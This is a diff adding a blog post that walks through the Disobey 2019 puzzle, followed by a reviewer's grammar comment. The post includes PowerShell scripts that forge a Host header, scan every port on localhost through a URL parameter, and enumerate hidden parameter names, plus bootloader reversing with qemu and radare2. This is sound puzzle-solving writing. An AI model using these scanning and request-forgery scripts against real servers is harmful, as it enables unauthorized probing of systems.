_posts/2019-01-10-disobey-puzzle-with-powershell.md

```diff
@@ -0,0 +1,283 @@
+}
+catch { 
+	$virhe = $_.ErrorDetails
+	$res = $_.Exception.Response 
+}
+
+$len = $res.RawContentLength 
+if($res.ContentLength -gt $len) {
+	$len = $res.ContentLength
+}
+
+$res | % { if($len -gt 0) { ("Status: " + [int]$_.StatusCode +" | Length: " +$len) + " | Parameter: "+ $p + ", " + $p2 + " | ErrorDetails: "+$virhe } }
+```
+
+Then we brute force the tcp ports with oneliner. 
+
+```PowerShell 
+1..65535 | % { .\ps_admin_test_params.ps1 "url" ("2130706433:"+$_) }
+```
+
+After a while we found new port that we had not found before: 40053. Which returns a long string which again looks like Base64. 
+
+## Reversing the bootloader
+
+I had absolutely no luck figuring out what this is with Windows so I went to the Linux and used file to recognize it as a gzip compressed data. I had tried to just unzip it and other things but it just did not work with 7zip. Finally I was able to get binary out in a working format with tar. I guess it was just the tar that beat the me with Windows. 
+
+Nevertheless now I had binary that I recognized to be some kind of bootloader. As I had absolutely no experience on reverse engineering this kind of things I asked community a bit help about tooling. I tried both IDa and radare2 but finally solved the puzzle with radare2. My approach in the end (after spending so many hours) was really simple. 
+
+Start bootloader with qemu
+
+```
+.\qemu-system-i386.exe -s .\bootloader
+```
+
+Attach radare2 as a debugger
+
+```
+.\radare2.exe -D gdb -d gdb://localhost:1234
+```
+
+Press all the buttons in the keyboard. Preferably vvv and qq. Suddenly some magic happens with radare2 and look you look something like this. 
+
+```
+|....[!] PANIC .Route OS...Disk read failed!...Proxy server to us
+|e for fetching files (optional): .Connection to mirror failed vi
+|a proxy: .Halting....Overflow (Checksum mismatch) ...GJXHcLO]MhQTbRm\Up_lsi_Zc^n....asd.............ACBD.127.0.0.1:8021?=GIVE_GIVE_GIVE_ME_MY_TICKET............................................
+```
+
+## The final step
+
+We finally found something that uses the 8021 port. We are close but nothing really works out of the box. Thinking a bit we found a correct question. What is the url parameter for the GIVE_GIVE_GIVE_ME_MY_TICKET. Yet again we go with the PowerShell and enumerate things a bit. 
+
+```PowerShell
+[cmdletbinding()]
+Param(
+	[string]$p,
+	[string]$pMethod)
+$res = ""
+$virhe = ""
+
+$Headers = @{
+	Host = "admin"
+}
+
+try { 
+	$res = Invoke-WebRequest ("http://puzzle.disobey.fi:8021?"+$p+"=GIVE_GIVE_GIVE_ME_MY_TICKET") -UseBasicParsing -Method $pMethod -Headers $Headers
+}
+catch { 
+	$virhe = $_.ErrorDetails
+	$res = $_.Exception.Response 
+}
+
+$res | % { if($_.RawContentLength -gt 0) { ("Status: " + [int]$_.StatusCode +" | Length: " +$_.RawContentLength) + " | Parameter: "+ $p + " | ErrorDetails: "+$virhe } }
+```
+
+By passing the previously used burp-parameter-names list for the script we can find out that the missing parameter name.  
```

Comment:
"find out that the missing parameter name"  -> "find out that missing parameter name" tai sitten "find out the missing parameter name".